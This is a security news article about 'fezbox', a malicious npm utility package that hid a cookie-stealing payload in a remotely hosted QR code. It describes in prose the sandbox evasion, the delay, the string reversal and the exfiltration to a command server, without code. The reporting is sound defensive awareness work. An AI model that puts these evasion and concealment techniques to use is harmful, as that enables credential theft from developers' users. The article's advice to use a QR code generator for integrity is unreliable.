New Malware in npm Package Uses Steganographic QR Codes to Steal Browser Passwords

A sophisticated malware campaign has recently surfaced in the npm ecosystem, employing a unique steganographic method to embed malicious code within QR codes. This innovative approach demonstrates a significant evolution in supply chain threats, showcasing how cybercriminals continually devise creative methods to bypass security measures and evade detection.

The Malicious Package: "Fezbox"

Identified as "fezbox," the malicious npm package presents itself as a legitimate JavaScript/TypeScript utility library. It cleverly disguises its true nature by secretly executing password-stealing operations through QR code-embedded payloads. The package masquerades as a comprehensive utility library that offers TypeScript support, performance optimization, and modular functionality.

According to its documentation, the package provides common helper functions organized by feature modules, enabling developers to import only the necessary components. Notably, the README file mentions a QR Code Module for generating and parsing, but it intentionally omits crucial details about the package's capability to fetch QR codes from remote URLs and execute embedded malicious code.

Discovery and Analysis

Security analysts at Socket.dev detected the malware after observing suspicious behavioral patterns within the package's codebase. Their investigation revealed multiple layers of obfuscation techniques, including string reversal, code minification, and the novel use of steganographic QR codes to conceal the final payload.

Upon discovery, the fezbox package was still active on the npm registry. In response, Socket.dev petitioned the npm security team for its immediate removal and the suspension of the threat actor’s account.

Advanced Steganographic Payload Delivery

The malware employs a sophisticated multi-stage execution process, which begins with environmental checks and timing delays to avoid sandbox detection. Initially, it contains browser-specific conditionals that verify the presence of window and document objects, ensuring execution occurs only in legitimate browser environments. Once the conditions are met, the malware waits 120 seconds before initiating the payload retrieval process.

The core malicious functionality centers on a reversed URL string that conceals the location of the steganographic QR code. When reversed, this string leads to a Cloudinary-hosted QR code image containing the final malicious payload. The QR code serves as a steganographic container, hiding code that extracts username and password values from browser cookies.

Upon decoding, the payload attempts to locate cookies containing authentication credentials, specifically targeting fields labeled "username" and "password" through additional string obfuscation techniques. The extracted credentials are then exfiltrated via an HTTPS POST request to a command-and-control server hosted on Railway, a cloud platform service.

Implications and Defense

This multi-layered approach – combining environmental evasion, timing delays, string reversal, concealment, and credential extraction – exemplifies a sophisticated evolution in npm-based supply chain attacks. Security teams must be prepared to defend against such intricate threats, which challenge traditional detection methods.

The emergence of this malware highlights the need for enhanced vigilance within the developer community and underscores the importance of thorough security audits for package dependencies. Developers should consider using a QR code generator to ensure the integrity of QR code usage within their applications.

As cybercriminals continue to innovate, it is imperative for security professionals to stay informed and adopt proactive measures to safeguard against emerging threats. Staying updated with the latest developments in cybersecurity and regularly reviewing security protocols can help mitigate the risks posed by such evolving attacks.